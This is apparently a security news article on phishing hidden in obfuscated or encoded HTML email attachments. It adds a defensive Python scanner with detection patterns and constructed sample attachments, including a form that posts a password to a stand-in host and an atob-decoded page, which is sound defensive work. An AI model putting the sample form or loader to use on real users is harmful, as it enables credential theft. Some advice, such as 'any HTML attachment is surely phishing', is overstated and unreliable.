Cybercriminals are always looking for new ways to help phishing attempts bypass antivirus engines, and attaching HTML documents to email is an increasingly popular method for doing so.
Rather than inserting a link to a phishing page in the body of an email, where email filters will likely find it, attackers use malicious HTML attachments, which make it easier to disguise phishing content.
According to Kaspersky, there are two main types of HTML attachments that cybercriminals use: HTML files with a link to a fake website or an entire phishing page. The first type allows the attacker to hide a link in the attached file and to automatically redirect the potential victim to a fraudulent site, while the second type allows the attacker to skip creating a fake website and save on web hosting costs.
Malicious HTML attachments are a growing threat, and in the first four months of this year alone, Kaspersky detected nearly two million emails that contained them.
Hiding phishing pages in attachments
Phishing content in HTML attachments is usually written in JavaScript in order to handle redirecting users to phishing sites or to obtain their credentials. Normally the HTML page sends the data to a malicious URL specified in the script itself. However, if the attachment contains malicious text or links in plain text, it can be blocked by antivirus and other security software – which is why cybercriminals use JavaScript obfuscation instead.
This technique involves rewriting code so that it is difficult to read and understand. While some cybercriminals do this manually to make restoring the original code more difficult, others rely on any number of ready-made tools to do so.
Another technique used to hide phishing content in email attachments is to encode or compress their code so that it looks much smaller than it actually is. In one recent case, Kaspersky came across an email with a malicious HTML attachment that contained an entire phishing page encoded in a small two-line script.
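As an added example (not from Kaspersky or the original article), here is a static triage check in Python for the attachment traits described above: redirects, a credential form that posts to a remote URL, and a long encoded literal unpacked by a short script. The indicator names, the 200-character threshold and the sample attachments are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Calls that commonly unpack an encoded page when the attachment is opened.
DECODERS = re.compile(r"\b(atob|unescape|decodeURIComponent|eval|document\.write)\s*\(")
REDIRECT = re.compile(r"\blocation(\.href|\.replace|\.assign)?\s*[=(]")
LONG_LITERAL = re.compile(r"""["'][A-Za-z0-9+/=%]{200,}["']""")

class AttachmentScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._in_script, self._action = set(), False, ""

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.add("meta-refresh")
        elif tag == "form":
            self._action = a.get("action", "").lower()
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.add("password-field")
            if self._action.startswith(("http://", "https://")):
                self.findings.add("credential-post-to-remote-url")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form":
            self._action = ""

    def handle_data(self, data):
        if not self._in_script:
            return
        for name, rx in (("runtime-decoder", DECODERS), ("script-redirect", REDIRECT),
                         ("long-encoded-literal", LONG_LITERAL)):
            if rx.search(data):
                self.findings.add(name)

def scan_html_attachment(text):
    """Return sorted indicator names found in one HTML attachment body."""
    scanner = AttachmentScan()
    scanner.feed(text)
    scanner.close()
    return sorted(scanner.findings)

# Constructed samples (not taken from real mail); .invalid hosts never resolve.
ENCODED = '<html><body><script>var p="' + "QUJD" * 60 + '";\ndocument.write(atob(p));</script></body></html>'
REDIRECTING = ('<html><head><meta http-equiv="refresh" content="0;url=https://login.example.invalid/">'
               '</head><body><script>window.location.href="https://login.example.invalid/";</script></body></html>')
FORM = '<form action="https://collect.example.invalid/p" method="post"><input type="password" name="p"></form>'
BENIGN = "<html><body><p>Quarterly report attached.</p></body></html>"
```

The findings are triage signals for a mail gateway or analyst queue, not verdicts: legitimate pages also use redirects and decoders, so they are best combined with sender and attachment-type context.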
How to spot a phishing website or email
Phishing sites come in all shapes and sizes but are often designed to mimic legitimate web pages so that users don’t think twice when entering their credentials. Even if a cybercriminal makes an almost identical copy of a company’s web page, misspellings on the page itself or the URL in your browser’s address bar can be a dead giveaway that the site is fake.
To avoid having your online account credentials stolen by cybercriminals, you should always head to a company’s login page via its website or through a search engine rather than from an email. This way you will know that you are going to the actual website instead of a fake website impersonating a brand or company.
When it comes to phishing emails, you should always avoid opening emails from unknown senders. Another trick that cybercriminals use to lure you is to instill a sense of urgency into their messages. Companies and even the government rarely ask you to respond to one of their messages in a timely manner. At the same time, it’s worth noting that some government organizations like the IRS will never contact you via email and any tax issues will be reported to you by mail instead.
To avoid becoming a victim of phishing scams, you must avoid opening emails from unknown senders. This also applies to any attachments they contain. Although Word files, PDFs, and other office documents are usually attached to emails, very few people send web pages as HTML attachments, and if you see an email with one in your inbox, you can be sure that it’s a phishing email.
Since phishing is often used to steal credentials to commit fraud or even identity theft, you can use a password manager to securely store your passwords and even create strong and complex passwords for each of your accounts to make them more difficult to hack or guess.